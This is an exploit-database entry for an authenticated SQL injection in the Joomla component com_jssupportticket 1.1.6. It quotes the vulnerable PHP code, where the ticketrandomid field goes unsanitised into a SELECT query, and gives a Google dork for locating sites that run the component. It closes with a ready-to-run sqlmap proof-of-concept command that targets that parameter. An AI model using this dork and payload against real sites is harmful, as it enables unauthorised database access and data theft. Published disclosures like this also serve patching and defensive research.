Joomla! Component JS Support Ticket (com_jssupportticket) 1.1.6 - 'ticketreply.php' SQL Injection

Author: qw3rTyTy
type: webapps
platform: php
port: 80.0
date_added: 2019-08-12 
date_updated: 2019-08-12 
verified: 0 
codes:  
tags: SQL Injection (SQLi)
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comjssupportticket_jm.zip

#Exploit Title: Joomla! component com_jssupportticket - Authenticated SQL Injection
#Dork: inurl:"index.php?option=com_jssupportticket"
#Date: 10.08.19
#Exploit Author: qw3rTyTy
#Vendor Homepage: https://www.joomsky.com/
#Software Link: https://www.joomsky.com/46/download/1.html
#Version: 1.1.6
#Tested on: Debian/nginx/joomla 3.9.0
#####################################
#Vulnerability details:
#####################################
Vulnerable code is in line 31 in file admin/models/ticketreply.php

	...snip...
    24	    function storeTicketReplies($ticketid, $message, $created, $data2) {
    25	        if (!is_numeric($ticketid))
    26	            return false;
    27
    28	        //validate reply for break down
    29	        $ticketrandomid   = $data2['ticketrandomid'];		//!!!
    30	        $db = $this->getDBo();
    31	        $query = "SELECT id FROM `#__js_ticket_tickets` WHERE ticketid='$ticketrandomid'";	//!!!
    32	        $db->setQuery($query);
    33	        $res = $db->loadResult();
    34	        if($res != $ticketid){
    35	            return false;
    36	        }//end
    ...snip...

#####################################
#PoC:
#####################################
$> sqlmap.py -u "http://localhost/index.php" --random-agent --dbms=mysql --method POST --data 'option=com_jssupportticket&c=ticket&task=actionticket&Itemid=666&ticketid=666&callfrom=savemessage&message=woot&created=woot&ticketrandomid=woot&{VALID_FORMTOKEN_FROM_TICKETDETAIL}=1' -p ticketrandomid --cookie 'VALID_SESSION_ID=VALID_SESSION_ID'